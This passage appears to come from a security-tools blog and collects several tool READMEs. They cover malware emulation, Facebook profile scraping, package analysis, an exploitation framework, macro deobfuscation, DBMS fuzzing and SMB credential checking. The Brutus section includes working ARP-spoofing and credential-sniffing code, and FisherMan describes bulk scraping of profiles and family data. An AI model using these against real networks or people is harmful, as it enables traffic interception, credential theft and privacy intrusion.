# Yes, I know...this is a huge kludge... :-/
#

FPU emulation issue:

#
# Fixup #2
# The "fpu" related instructions (FPU/FNSTENV), used to recover EIP, sometimes
# return the wrong addresses.
# In this case, I need to track the first FPU instruction and then place
# its address on the stack when FNSTENV is called
#

Trap Flag evasion:

#
# Fixup #3
# Trap Flag evasion technique
# https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/
#
# The call of the RDTSC with the trap flag enabled, cause an unhandled
# interrupt. Example code:
# pushf
# or dword [esp], 0x100
# popf
# rdtsc
#
# Any call to RDTSC with Trap Flag set will be intercepted and TF will
# be cleared
#
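To make the third fixup concrete, here is a minimal, self-contained Python sketch (my own simplification, not REW-sploit's actual hook) that uses Unicorn to run the evasion snippet above while a code hook clears the Trap Flag whenever the next instruction is RDTSC (opcodes 0F 31):

from unicorn import Uc, UC_ARCH_X86, UC_MODE_32, UC_HOOK_CODE
from unicorn.x86_const import UC_X86_REG_EFLAGS, UC_X86_REG_ESP

# The evasion sequence from the comment above: set TF via the stack, then RDTSC.
CODE = bytes.fromhex(
    "9c"              # pushf
    "810c2400010000"  # or dword [esp], 0x100   (set the Trap Flag)
    "9d"              # popf
    "0f31"            # rdtsc
)
BASE, STACK = 0x1000, 0x20000

def clear_tf_on_rdtsc(uc, address, size, user_data):
    # If the instruction about to execute is RDTSC, drop TF (bit 8 of EFLAGS).
    if bytes(uc.mem_read(address, 2)) == b"\x0f\x31":
        uc.reg_write(UC_X86_REG_EFLAGS,
                     uc.reg_read(UC_X86_REG_EFLAGS) & ~0x100)

emu = Uc(UC_ARCH_X86, UC_MODE_32)
emu.mem_map(BASE, 0x1000)
emu.mem_map(STACK, 0x1000)   # pushf/popf need a stack
emu.mem_write(BASE, CODE)
emu.reg_write(UC_X86_REG_ESP, STACK + 0x800)
emu.hook_add(UC_HOOK_CODE, clear_tf_on_rdtsc)
emu.emu_start(BASE, BASE + len(CODE))
print("emulation completed without an unhandled trap")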

Customize YARA rules

The file modules/emulate_rules.py contains the YARA rules used to intercept the interesting parts of the code, in order to implement instrumentation. I tried to comment these sections as much as possible so that you can create your own rules (please share them with a pull request if you think they can help others). For example:

#
# Payload Name: [MSF] windows/meterpreter/reverse_tcp_rc4
# Search for : mov esi,dword ptr [esi]
# xor esi,0x<const>
# Used for : this xor instruction contains the constant used to
# encrypt the length of the payload that will be sent as 2nd
# stage
# Architecture: x32
#
yara_reverse_tcp_rc4_xor_32 = 'rule reverse_tcp_rc4_xor { \
strings: \
$opcodes_1 = { 8b 36 \
81 f6 ?? ?? ?? ?? } \
condition: \
$opcodes_1 }'

Issues

Please open an issue if you find something that does not work or could be improved. Thanks!



FisherMan - CLI Program That Collects Information From Facebook User Profiles Via Selenium

20 August 2021 at 12:30
By: Zion3R


Search for public profile information on Facebook


Installation
# clone the repo
$ git clone https://github.com/Godofcoffe/FisherMan

# change the working directory to FisherMan
$ cd FisherMan

# install the requirements
$ python3 -m pip install -r requirements.txt

Pre-requisites
  • Make sure you have the executable "geckodriver" installed on your machine.

Usage
$ python3 fisherman.py --help
usage: fisherman.py [-h] [--version] [-u USERNAME [USERNAME ...] | -i ID
[ID ...] | --use-txt TXT_FILE | -S USER] [-sf]
[--specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...]] [-s] [-b]
[--email EMAIL] [--password PASSWORD] [-o] [-c] [-v | -q]

FisherMan: Extract information from facebook profiles. (Version 3.4.0)

optional arguments:
-h, --help show this help message and exit
--version Shows the current version of the program.
-u USERNAME [USERNAME ...], --username USERNAME [USERNAME ...]
Defines one or more users for the search.
-i ID [ID ...], --id ID [ID ...]
Set the profile identification number.
--use-txt TXT_FILE Replaces the USERNAME parameter with a user list in a
txt.
-S USER, --search USER
It does a shallow search for the username. Replace the
spaces with '.'(period).
-sf, --scrape-family If this parameter is passed, the information from
family members will be scraped if available.
--specify {0,1,2,3,4,5} [{0,1,2,3,4,5} ...]
Use the index number to return a specific part of the
page. about: 0,about_contact_and_basic_info:
1,about_family_and_relationships: 2,about_details:
3,about_work_and_education: 4,about_places: 5.
-s, --several Returns extra data like profile picture, number of
followers and friends.
-b, --browser Opens the browser/bot.
--email EMAIL If the profile is blocked, you can define your
account, however you have the search user in your
friends list.
--password PASSWORD Set the password for your facebook account, this
parameter has to be used with --email.
-o, --file-output Save the output data to a .txt file.
-c, --compact Compress all .txt files. Use together with -o.
-v, -d, --verbose, --debug
It shows in detail the data search process.
-q, --quiet Eliminates and simplifies some script outputs for a
simpler and more discrete visualization.

To search for a user:

  • User name: python3 fisherman.py -u name name.profile name.profile2
  • ID: python3 fisherman.py -i 000000000000

The username must be found on the facebook profile link, such as:

https://facebook.com/name.profile/

It is also possible to load multiple usernames from a .txt file; this can be useful for brute-force-style batch searches:

python3 fisherman.py --use-txt filename.txt

Some profiles restrict who can view their information, so you can use your own account for the extraction. Note: this should be used as a last resort, and the target profile must be on your friends list:

python3 fisherman.py --email your@email.com --password yourpass

Some situations:
  • For complete massive scrape:

    python3 fisherman.py --use-txt file -o -c -sf

With a file containing dozens of names, one per line, you can run a complete "scan" that collects each profile's information (and even that of their family members), compressed into a .zip at the output.

  • For specific parts of the account:

    • Basic data: python3 fisherman.py -u name --specify 0
    • Family and relationships: python3 fisherman.py -u name --specify 2
    • It is still possible to mix: python3 fisherman.py -u name --specify 0 2
  • To get additional things like profile picture, how many followers and how many friends:

    python3 fisherman.py -u name -s

This tool only extracts information that is public. Do not use it for private or illegal purposes.

LICENSE

BSD 3-Clause © FisherMan Project

Original Creator - Godofcoffe



PackageDNA - Tool To Analyze Software Packages Of Different Programming Languages That Are Being Or Will Be Used In Their Codes

20 August 2021 at 21:30
By: Zion3R


This tool gives developers, researchers and companies the ability to analyze software packages of different programming languages that are being or will be used in their code, providing information that lets them know in advance whether a library follows secure development processes, whether it is currently supported, possible backdoors (malicious embedded code), typosquatting analysis, and the package's version history and reported vulnerabilities (CVEs).
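As a rough illustration of the typosquatting idea (a sketch of one possible signal, not PackageDNA's actual algorithm), a checker can flag names suspiciously close to popular packages; the package list and threshold below are invented for the example:

import difflib

# Made-up shortlist of popular package names and similarity cutoff.
POPULAR = ["requests", "urllib3", "numpy", "pandas", "django", "flask"]

def typosquat_candidates(name, cutoff=0.85):
    # Flag popular packages whose names are nearly identical to `name`.
    return [package for package in POPULAR
            if package != name
            and difflib.SequenceMatcher(None, name, package).ratio() >= cutoff]

print(typosquat_candidates("reqeusts"))  # ['requests']
print(typosquat_candidates("requests"))  # []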


Installation

Clone this repository with:

git clone https://github.com/ElevenPaths/packagedna

PackageDNA uses python-magic which is a simple wrapper around the libmagic C library, and that MUST be installed as well:

Debian/Ubuntu
$ sudo apt-get install libmagic1

Windows
You will need DLLs for libmagic. @julian-r has uploaded a version of this project that includes binaries
to PyPI: https://pypi.python.org/pypi/python-magic-bin/0.4.14
Other sources of the libraries in the past have been File for Windows.
You will need to copy the file magic out of [binary-zip]\share\misc, and pass its location to Magic(magic_file=...).

If you are using a 64-bit build of python, you will need 64-bit libmagic binaries which can be found here: https://github.com/pidydx/libmagicwin64.
Newer version can be found here: https://github.com/nscaife/file-windows.

OSX
When using Homebrew: brew install libmagic
When using macports: port install file


More details: https://pypi.org/project/python-magic/

Run setup for installation:

python3 setup.py install --user

External Modules

PackageDNA uses external modules for its analysis that you should install previously:

Microsoft AppInspector

https://github.com/microsoft/ApplicationInspector

Virus Total API

https://www.virustotal.com/

LibrariesIO API

https://libraries.io/

Rubocop

https://github.com/rubocop/rubocop

After installation you should configure the external modules, in the option [7] Configuration of the main menu.

[1] VirusTotal API Key: Your API KEY
[2] AppInspector absolute path: /Local/Path/MSAppInspectorInstallation
[3] Libraries.io API Key: Your API KEY
[4] Github Token: Your Token
[B] Back
[X] Exit

NOTE: External modules are not mandatory; PackageDNA will continue its execution without them. However, we recommend configuring all of these modules so that the tool performs a complete analysis.


Running PackageDNA

Inside the PackageDNA directory:

./packagedna.py
_____              _                          ____     __     _  _______ 
| __ \ | | | __ \ | \ | || ___ |
| |__) |__ __ ____ | | __ __ __ ____ ___ | | \ \ | |\ \ | || |___| |
| ___// _` |/ __)| |/ / / _` | / _ | / _ \| | | || | \ \| || ___ |
| | | (_| || (__ | |\ \ | (_| || (_| || __/| |__/ / | | \ || | | |
|_| \__,_|\____)|_| \_\ \__,_| \__ | \___||_____/ |_| \__||_| |_|
__| |
(____|

Modular Packages Analyzer Framework
By ElevenPaths https://www.elevenpaths.com/
Usage: python3 ./packagedna.py

[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Select from the menu:
[*] -------------------------------------------------------------------------------------------------------------- [*]
[1] Analyze Package (Last Version)
[2] Analyze Package (All Versions)
[3] Analyze local package
[4] Information gathering
[5] Upload file and analyze all Packages
[6] List previously analyzed packages
[7] Configurations
[X] Exit
[*] -------------------------------------------------------------------------------------------------------------- [*]
[!] Enter your selection:


Brutus - An Educational Exploitation Framework Shipped On A Modular And Highly Extensible Multi-Tasking And Multi-Processing Architecture

21 August 2021 at 12:30
By: Zion3R


An educational exploitation framework shipped on a modular and highly extensible multi-tasking and multi-processing architecture.


Brutus: an Introduction

Looking for version 1? See the branches in this repository.

Brutus is an educational exploitation framework written in Python. It automates pre- and post-connection network-based exploits, as well as web-based reconnaissance. As a lightweight framework, Brutus aims to minimize reliance on third-party dependencies. Optimized for Kali Linux, Brutus is also compatible with macOS and most Linux distributions, featuring a fully interactive command-line interface and a versatile plugin system.

Brutus features a highly extensible, modular architecture. The included exploits (the plugins layer) consist of several decoupled modules that run on a 'tasking layer' comprised of thread pools and thread-safe async queues (whichever is most appropriate for the given module). The main thread runs atop a multi-processing pool that manages app context and dispatches new processes so tasks can run in the background, in separate shells, etc.

The UI layer is also decoupled and extensible. By default, Brutus ships with a menu-based command-line interface UI but there's no reason you can't add adapters for a GUI, an argument parser, or even an HTTP API or remote procedure call.

Last, Brutus has a utility layer with common faculties for file-system operations, shell (terminal emulator) management, persistence methods, and system metadata.

If you're just interested in some Python hacking, feel free to pull the scripts directly - each module can be invoked standalone.


Demos

Web Scanning and Payload Compilation Demo: watch mp4


Installation

You will probably want the following dependencies:

  • sslstrip
  • pipenv

Brutus is optimized for Kali Linux. There's lots of information online about how to run Kali Linux in a VM.

To install:

pipenv install

Usage

Run:

pipenv run brutus

Test:

pipenv run test

Lint:

pipenv run lint

Setup Git Hooks for Development:

pipenv run setup

Feel free to open PRs with feature proposals, bugfixes, et al. Note that much of this project is still in progress. The base is there and ready for you to build upon.


Brutus: Features and Included Modules

Brutus includes several modules which can be generalized as belonging to three macro-categories: network-based, web-based, and payloads. The latter category is a library of compilers and accompanying payloads - payloads can be compiled via Brutus' interactive command-line menu; compiled payloads can subsequently be loaded into many of Brutus' applicable network-based modules.

The base layer of Brutus utilizes POSIX threads for concurrent multi-tasking. Some modules - i.e. essentially anything heavily I/O bound - instead utilize Python's async I/O libraries and run on an abstraction atop Python's default event loop.

Included Utilities/Scripts

  • IP Table Management
  • Downgrade HTTPS to HTTP
  • Enable Monitor Mode
  • Enable Port Forwarding
  • Keylogger

Documentation

48-bit MAC Address Changer (view source)

NOTE: This tool is for 48-bit MACs, with a %02x default byte format.

MAC (Media Access Control) is a permanent, physical, and unique address assigned to network interfaces by device manufacturers. This means even your wireless card, for instance, has its own unique MAC address.

The MAC address, analogous to an IP on the internet, is utilized within a network in order to facilitate the proper delivery of resources and data (i.e. packets). An interaction will generally consist of a source MAC and a destination MAC. MAC addresses can identify you, be filtered, or otherwise access-restricted.

Important to note is these unique addresses are not ephemeral; they are persistent and will remain associated with a device were a user to install it in another machine. But the two don't have to be inextricably intertwined...

This module will accept as user-input any given wireless device and any valid MAC address to which the user wishes to reassign said device. The program is simple such that I need not explain it much further: it utilizes the subprocess module to automate the sequence of the necessary shell commands to bring the wireless interface down, reassign the MAC, and reinitialize it.

If you are actively changing your MAC address, it might be prudent to have some sort of validation structure or higher order method to ensure that 1) the wireless device exists, 2) the wireless device accommodates a MAC address, 3) the user-input MAC address is of a valid format, and 4) the wireless device's MAC address has successfully been updated. This tool automates these functions.

By selecting the 'generate' option in lieu of a specific MAC address, the program will generate a valid MAC address per IEEE specifications. I'm excited to have implemented extended functionality for generating not only wholly random (and valid) MAC addresses, but MAC addresses which either begin with a specific vendor prefix (OUI), or are generated with multicast and/or UAA options. These options trigger byte-code logic in the generator method, which are augmented per IEEE specifications. Learn more about MAC addresses here.
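A condensed Python sketch of that flow (a Linux illustration using the ip utility and the subprocess module, not Brutus' exact implementation; the interface name is an example):

import random
import re
import subprocess
import sys

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$", re.I)

def random_mac():
    # First byte: set the locally-administered bit and clear the multicast
    # bit, per IEEE 802 rules for self-assigned unicast addresses.
    first = (random.randint(0, 255) | 0x02) & 0xFE
    rest = [random.randint(0, 255) for _ in range(5)]
    return ":".join(f"{b:02x}" for b in [first] + rest)

def change_mac(interface, mac):
    if not MAC_RE.match(mac):
        sys.exit(f"invalid MAC address: {mac}")
    # Bring the interface down, reassign the MAC, bring it back up.
    subprocess.run(["ip", "link", "set", interface, "down"], check=True)
    subprocess.run(["ip", "link", "set", interface, "address", mac], check=True)
    subprocess.run(["ip", "link", "set", interface, "up"], check=True)

if __name__ == "__main__":
    change_mac("wlan0", random_mac())  # requires root; wlan0 is an example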


ARP-Based Network Scanner (view source)

The network scanner is another very useful tool, and a formidable one when used in conjunction with the aforementioned MAC changer. This scanner utilizes ARP request functionality by accepting as user input a valid ipv4 or ipv6 IP address and accompanying - albeit optional - subnet range.

The program then takes the given IP and/or range, then validates them per IEEE specifications (again, this validation is run against ipv4 and ipv6 standards). Finally, a broadcast object is instantiated with the given IP and a generated ethernet frame; this object returns to us a list of all connected devices within the given network and accompanying range, mapping their IPs to respective MAC addresses.

The program outputs a table with these associations, which then might be used as input for the MAC changer should circumstances necessitate it.
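A minimal sketch of the broadcast step described above (using scapy, which requires root; the subnet is an example and this is an illustration, not Brutus' code):

from scapy.all import ARP, Ether, srp

def arp_scan(cidr):
    # Ethernet broadcast frame wrapping an ARP who-has for every IP in range.
    packet = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=cidr)
    answered, _ = srp(packet, timeout=2, verbose=False)
    return [(received.psrc, received.hwsrc) for _, received in answered]

for ip, mac in arp_scan("192.168.1.0/24"):  # example subnet
    print(f"{ip:<16} {mac}")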


Automated ARP Spoofing (view source)

The ARP Spoof module enables us to redirect the flow of packets in a given network by simultaneously manipulating the ARP tables of a given target client and its network's gateway. This module auto-enables port forwarding during this process, and dynamically constructs and sends ARP packets.

When the module is terminated by the user, the targets' ARP tables are reset, so as not to leave the controller in a precarious situation (plus, it's the nice thing to do).

Because this process places the controller in the middle of the packet-flow between the client and AP, the controller therefore has access to all dataflow (dealing with potential encryption of said data is a task for another script). From here, the myriad options for packet-flow orchestration become readily apparent: surrogation of code by way of automation and regular expressions, forced redirects, remote access, et al. Fortunately, Brutus can automate this, too.
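A condensed sketch of the poisoning loop and the ARP-table restoration on exit (scapy, root required; the addresses are examples and port forwarding is assumed already enabled, as described above):

import time
from scapy.all import ARP, getmacbyip, send

target_ip, gateway_ip = "192.168.1.10", "192.168.1.1"  # example addresses
target_mac, gateway_mac = getmacbyip(target_ip), getmacbyip(gateway_ip)

def poison(victim_ip, victim_mac, spoofed_ip):
    # ARP "is-at" reply claiming spoofed_ip lives at *our* MAC
    # (scapy fills in hwsrc with the local interface's address).
    send(ARP(op=2, pdst=victim_ip, hwdst=victim_mac, psrc=spoofed_ip),
         verbose=False)

def restore():
    # Re-associate the real IP/MAC pairs, as the module does on termination.
    send(ARP(op=2, pdst=target_ip, hwdst=target_mac,
             psrc=gateway_ip, hwsrc=gateway_mac), count=4, verbose=False)
    send(ARP(op=2, pdst=gateway_ip, hwdst=gateway_mac,
             psrc=target_ip, hwsrc=target_mac), count=4, verbose=False)

try:
    while True:
        poison(target_ip, target_mac, gateway_ip)   # we "become" the gateway
        poison(gateway_ip, gateway_mac, target_ip)  # and the target
        time.sleep(2)
except KeyboardInterrupt:
    restore()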


HTTP Packet Sniffer (view source)

The packet sniffer is an excellent module to employ after running the ARP Spoofer; it creates a dataflow of all intercepted HTTP packets' data, which includes URLs and possible user credentials.

The script is extensible and can accommodate a variety of protocols by instantiating the listener object with one of many available filters. Note that Brutus automatically downgrades HTTPS, so unless HSTS is involved, the dataflow should be viable for reconnaissance.
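
A minimal sketch of such a listener using scapy's sniff with a BPF filter; the keyword list is illustrative rather than the module's actual filter set:

from scapy.all import Raw, TCP, sniff

KEYWORDS = (b"username", b"user", b"login", b"password", b"pass")

def inspect(packet):
    if packet.haslayer(TCP) and packet.haslayer(Raw):
        payload = packet[Raw].load
        if payload.startswith((b"GET ", b"POST ")):
            # The first line of an HTTP request holds the method and URL.
            print(payload.split(b"\r\n", 1)[0].decode(errors="replace"))
        if any(k in payload.lower() for k in KEYWORDS):
            print("[+] possible credentials:", payload[:200])

sniff(filter="tcp port 80", prn=inspect, store=False)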

Disclaimer: This software and all contents therein were created for research use only. I neither condone nor hold, in any capacity, responsibility for the actions of those who might intend to use this software in a manner malicious or otherwise illegal.



XLMMacroDeobfuscator - Extract And Deobfuscate XLM Macros (A.K.A Excel 4.0 Macros)

21 August 2021 at 21:30
By: Zion3R


XLMMacroDeobfuscator can be used to decode obfuscated XLM macros (also known as Excel 4.0 macros). It utilizes an internal XLM emulator to interpret the macros, without fully executing the code.

It supports xls, xlsm, and xlsb formats.

It uses xlrd2, pyxlsb2 and its own parser to extract cells and other information from xls, xlsb and xlsm files, respectively.

You can also find the XLM grammar in xlm-macro-lark.template


Installing the emulator
  1. Install using pip
pip install XLMMacroDeobfuscator
  2. Installing the latest development version
pip install -U https://github.com/DissectMalware/xlrd2/archive/master.zip
pip install -U https://github.com/DissectMalware/pyxlsb2/archive/master.zip
pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip

Running the emulator

To deobfuscate macros in Excel documents:

xlmdeobfuscator --file document.xlsm

To get only the deobfuscated macros, without any indentation:

xlmdeobfuscator --file document.xlsm --no-indent --output-formula-format "[[INT-FORMULA]]"

To export the output in JSON format:

xlmdeobfuscator --file document.xlsm --export-json result.json

To see a sample JSON output, please check this link out.

To use a config file:

xlmdeobfuscator --file document.xlsm -c default.config

The default.config file must be a valid JSON file, such as:

{
    "no-indent": true,
    "output-formula-format": "[[CELL-ADDR]] [[INT-FORMULA]]",
    "non-interactive": true,
    "output-level": 1
}

Command Line

_ _______
|\ /|( \ ( )
( \ / )| ( | () () |
\ (_) / | | | || || |
) _ ( | | | |(_)| |
/ ( ) \ | | | | | |
( / \ )| (____/\| ) ( |
|/ \|(_______/|/ \|
______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
| ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
| | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
| | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
| | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
| (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
(______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/


XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

usage: deobfuscator.py [-h] [-c FILE_PATH] [-f FILE_PATH] [-n] [-x] [-2]
[--with-ms-excel] [-s] [-d DAY]
[--output-formula-format OUTPUT_FORMULA_FORMAT]
[--no-indent] [--export-json FILE_PATH]
[--start-point CELL_ADDR] [-p PASSWORD]
[-o OUTPUT_LEVEL]

optional arguments:
-h, --help show this help message and exit
-c FILE_PATH, --config_file FILE_PATH
Specify a config file (must be a valid JSON file)
-f FILE_PATH, --file FILE_PATH
The path of a XLSM file
-n, --noninteractive Disable interactive shell
-x, --extract-only Only extract cells without any emulation
-2, --no-ms-excel [Deprecated] Do not use MS Excel to process XLS files
--with-ms-excel Use MS Excel to process XLS files
-s, --start-with-shell
Open an XLM shell before interpreting the macros in
the input
-d DAY, --day DAY Specify the day of month
--output-formula-format OUTPUT_FORMULA_FORMAT
Specify the format for output formulas ([[CELL-ADDR]],
[[INT-FORMULA]], and [[STATUS]])
--no-indent Do not show indent before formulas
--export-json FILE_PATH
Export the output to JSON
--start-point CELL_ADDR
Start interpretation from a specific cell address
-p PASSWORD, --password PASSWORD
Password to decrypt the protected document
-o OUTPUT_LEVEL, --output-level OUTPUT_LEVEL
Set the level of details to be shown (0: all commands,
1: commands no jump, 2: important commands, 3: strings in
important commands).
--timeout N stop emulation after N seconds (0: no interruption,
N>0: stop emulation after N seconds)

Library

The following example shows how XLMMacroDeobfuscator can be used in a python project to deobfuscate XLM macros:

from XLMMacroDeobfuscator.deobfuscator import process_file

result = process_file(file='path/to/an/excel/file',
                      noninteractive=True,
                      noindent=True,
                      output_formula_format='[[CELL-ADDR]], [[INT-FORMULA]]',
                      return_deobfuscated=True,
                      timeout=30)

for record in result:
    print(record)
  • note: the xlmdeobfuscator logo will not be shown when you use it as a library

Requirements

Please read requirements.txt to get the list of python libraries that XLMMacroDeobfuscator is dependent on.

xlmdeobfuscator can be executed on any OS to extract and deobfuscate macros in xls, xlsm, and xlsb files. You do not need to install MS Excel.

Note: if you want to use MS Excel (on Windows), you need to install the pywin32 library and use the --with-ms-excel switch. If --with-ms-excel is used, xlmdeobfuscator first attempts to load xls files with MS Excel; if that fails, it uses the xlrd2 library.


Projects Using XLMMacroDeobfuscator

XLMMacroDeobfuscator is adopted in the following projects:

Please contact me if you incorporated XLMMacroDeobfuscator in your project.


How to Contribute

If you found a bug or would like to suggest an improvement, please create a new issue on the issues page.

Feel free to contribute by forking the project and submitting a pull request.

You can reach me (@DissectMalware) on Twitter via a direct message.



SQLancer - Detecting Logic Bugs In DBMS

22 August 2021 at 12:30
By: Zion3R


SQLancer (Synthesized Query Lancer) is a tool to automatically test Database Management Systems (DBMS) in order to find logic bugs in their implementation. We refer to logic bugs as those bugs that cause the DBMS to fetch an incorrect result set (e.g., by omitting a record).

SQLancer operates in the following two phases:

  1. Database generation: The goal of this phase is to create a populated database and to stress the DBMS, increasing the probability of causing an inconsistent database state that can be detected subsequently. First, random tables are created. Then, randomly chosen SQL statements generate, modify, and delete data. Other statements, such as those that create indexes and views or set DBMS-specific options, are also sent to the DBMS.
  2. Testing: The goal of this phase is to detect the logic bugs based on the generated database. See Testing Approaches below.

Getting Started

Requirements:

  • Java 8 or above
  • Maven (sudo apt install maven on Ubuntu)
  • The DBMS that you want to test (SQLite is an embedded DBMS and is included)

The following commands clone SQLancer, create a JAR, and start SQLancer to test SQLite using Non-optimizing Reference Engine Construction (NoREC):

git clone https://github.com/sqlancer/sqlancer
cd sqlancer
mvn package -DskipTests
cd target
java -jar sqlancer-*.jar --num-threads 4 sqlite3 --oracle NoREC

If the execution prints progress information every five seconds, then the tool works as expected. Note that SQLancer might find bugs in SQLite. Before reporting these, be sure to check that they can still be reproduced when using the latest development version. The shortcut CTRL+C can be used to terminate SQLancer manually. If SQLancer does not find any bugs, it runs indefinitely. The option --num-tries can be used to control after how many bugs SQLancer terminates. Alternatively, the option --timeout-seconds can be used to specify the maximum duration that SQLancer is allowed to run.

If you launch SQLancer without parameters, the available options and commands are displayed. Note that general options that are supported by all DBMS-testing implementations (e.g., --num-threads) need to precede the name of the DBMS to be tested (e.g., sqlite3). Options that are supported only for a specific DBMS (e.g., --test-rtree for SQLite3), or options for which each testing implementation provides different values (e.g., --oracle NoREC), need to go after the DBMS name.


Research Prototype

This project should at this stage still be seen as a research prototype. We believe that the tool is not ready to be used. However, we have received many requests by companies, organizations, and individual developers, which is why we decided to prematurely release the tool. Expect errors, incompatibilities, lack of documentation, and insufficient code quality. That being said, we are working hard to address these issues and enhance SQLancer to become a production-quality piece of software. We welcome any issue reports, extension requests, and code contributions.


Testing Approaches
Approach Description
Pivoted Query Synthesis (PQS) PQS is the first technique that we designed and implemented. It randomly selects a row, called a pivot row, for which a query is generated that is guaranteed to fetch the row. If the row is not contained in the result set, a bug has been detected. It is fully described here. PQS is the most powerful technique, but also requires more implementation effort than the other two techniques. It is currently unmaintained.
Non-optimizing Reference Engine Construction (NoREC) NoREC aims to find optimization bugs. It is described here. It translates a query that is potentially optimized by the DBMS to one for which hardly any optimizations are applicable, and compares the two result sets. A mismatch between the result sets indicates a bug in the DBMS.
Ternary Logic Partitioning (TLP) TLP partitions a query into three partitioning queries, whose results are composed and compared to the original query's result set. A mismatch in the result sets indicates a bug in the DBMS. In contrast to NoREC and PQS, it can detect bugs in advanced features such as aggregate functions.
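
To make the TLP idea concrete, here is a minimal sketch against SQLite via Python's sqlite3 (the table and predicate are fabricated): under SQL's ternary logic, the guards p, NOT p, and p IS NULL are exhaustive and mutually exclusive, so composing the three partitioning queries must reproduce the original result set.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE t (x INTEGER)")
conn.executemany("INSERT INTO t VALUES (?)", [(1,), (2,), (None,)])

original = conn.execute("SELECT x FROM t").fetchall()

p = "x > 1"  # stands in for a randomly generated predicate
partitions = []
for guard in (p, f"NOT ({p})", f"({p}) IS NULL"):
    partitions += conn.execute(f"SELECT x FROM t WHERE {guard}").fetchall()

# A multiset mismatch between the composed partitions and the original
# result set would indicate a logic bug in the DBMS.
assert sorted(original, key=repr) == sorted(partitions, key=repr)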

Please find the .bib entries here.


Supported DBMS

Since SQL dialects differ widely, each DBMS to be tested requires a separate implementation.

DBMS Status Expression Generation Description
SQLite Working Untyped This implementation is currently affected by a significant performance regression that still needs to be investigated.
MySQL Working Untyped Running this implementation likely uncovers additional, unreported bugs.
PostgreSQL Working Typed
Citus (PostgreSQL Extension) Working Typed This implementation extends the PostgreSQL implementation of SQLancer, and was contributed by the Citus team.
MariaDB Preliminary Untyped The implementation of this DBMS is very preliminary, since we stopped extending it after all but one of our bug reports were addressed. Running it likely uncovers additional, unreported bugs.
CockroachDB Working Typed
TiDB Working Untyped
DuckDB Working Untyped, Generic
ClickHouse Preliminary Untyped, Generic Implementing the different table engines was not convenient, which is why only a very preliminary implementation exists.
TDEngine Removed Untyped We removed the TDEngine implementation since all but one of our bug reports were still unaddressed five months after we reported them.

Using SQLancer

Logs

SQLancer stores logs in the target/logs subdirectory. By default, the option --log-each-select is enabled, which results in every SQL statement that is sent to the DBMS being logged. The corresponding file names are postfixed with -cur.log. In addition, if SQLancer detects a logic bug, it creates a file with the extension .log, in which the statements to reproduce the bug are logged.


Reducing a Bug

After finding a bug, it is useful to produce a minimal test case before reporting the bug, to save the DBMS developers' time and effort. For many test cases, C-Reduce does a great job. In addition, we have been working on a SQL-specific reducer, which we plan to release soon.


Found Bugs

We would appreciate it if you mention SQLancer when you report bugs found by it. We would also be excited to know if you are using SQLancer to find bugs, or if you have extended it to test another DBMS (also if you do not plan to contribute it to this project). SQLancer has found over 400 bugs in widely-used DBMS, which are listed here.


Community

We have created a Slack workspace to discuss SQLancer, and DBMS testing in general. SQLancer's official Twitter handle is @sqlancer_dbms.


Additional Documentation

Releases

Official releases are available on:


Additional Resources
  • A talk on Ternary Logic Partitioning (TLP) and SQLancer is available on YouTube.
  • An (older) Pivoted Query Synthesis (PQS) talk is available on YouTube.
  • PingCAP has implemented PQS, NoREC, and TLP in a tool called go-sqlancer.
  • More information on our DBMS testing efforts and the bugs we found is available here.


Keimpx - Check For Valid Credentials Across A Network Over SMB

22 August 2021 at 21:30
By: Zion3R


keimpx is an open source tool, released under the Apache License 2.0.

It can be used to quickly check for valid credentials across a network over SMB. Credentials can be:

  • Combination of user / plain-text password.
  • Combination of user / NTLM hash.
  • Combination of user / NTLM logon session token.

If any valid credentials are discovered across the network after the attack phase, the user is asked to choose which host to connect to and which valid credentials to use. They will then be provided with an interactive SMB shell where they can:

  • Spawn an interactive command prompt.
  • Navigate through the remote SMB shares: list, upload and download files, create and remove files, etc.
  • Deploy and undeploy their own services, for instance, a backdoor listening on a TCP port for incoming connections.
  • List user details, domains and password policy.
  • More to come, see the issues page.

Dependencies

keimpx is currently developed using Python 3.8 and makes use of the excellent Impacket library from SecureAuth Corporation for much of its functionality. keimpx also makes use of the PyCryptodome library for cryptographic functions.
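
For a flavor of the kind of check keimpx performs, here is a minimal sketch using Impacket's SMBConnection (not keimpx's actual code); the host, account and hash are hypothetical placeholders:

from impacket.smbconnection import SMBConnection

def check_smb_login(host, user, password="", domain="", lmhash="", nthash=""):
    # Returns True if the user/password (or NTLM hash) pair is valid.
    try:
        conn = SMBConnection(host, host, timeout=10)
        conn.login(user, password, domain, lmhash, nthash)
        conn.logoff()
        return True
    except Exception:
        return False

if check_smb_login("192.168.1.10", "administrator",
                   nthash="8846f7eaee8fb117ad06bdd830b7586c"):
    print("[+] Valid credentials")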


Installation

To install keimpx, first install Python 3.8. On Windows, you can find the installer at this link. For Linux users, many distributions provide Python 3 and make it available via your package manager (usual package names include python3 and python).

On Linux systems, you may also need to install pip and openssl-dev using your package manager for the next step.

Once you have Python 3.8 installed, use pip to install the required dependencies using this command:

pip install -r requirements.txt

keimpx can then be executed by running on Linux systems:

./keimpx.py [options]

Or if this doesn't work:

python keimpx.py [options]
python3 keimpx.py [options]

On Windows systems, you may need to specify the full path to your Python 3.8 binary, for example:

C:\Python38\python.exe keimpx.py [options]

Please ensure you use the correct path for your system, as this is only an example.


Usage

